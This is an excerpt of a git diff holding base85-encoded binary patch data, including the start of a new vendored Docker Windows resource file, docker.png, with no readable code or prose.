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

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png
new file mode 100644
index 0000000000000000000000000000000000000000..88df0b66dfcf0b298de8cd296b793b9220c4a914
GIT binary patch
literal 658195
zcmeI52VfLM-^S;9dgxUo6akTtgq{#WZz3H8tb`;KDWNHduM$KQ)K9@e6$LBOqzFor
zPy}pLL3-~cKzhILKbJeW9LeSS?%qA4!|l#a{mo{dow~Dn_2}&HQ^kid=HInThdzwS
zW^?PMCYOZm&Hknz@3CD5O<>HoEVnYY@QX@}`ScvozJ0G=!{aB$PZ%CQHmGa+_CaIE
z#}6GbDvq(qCl~h}*01l43av8Ernc)gGvTvt@qNmB1@&q7K|;AXb?VpfF7@=x8cR=<
z@4cgR$BxRX`<Bd9eDqPmhvj=W@O$6qxaM+=uRogp&CK`z%(?K!HzSX2&A9qc{)Yde
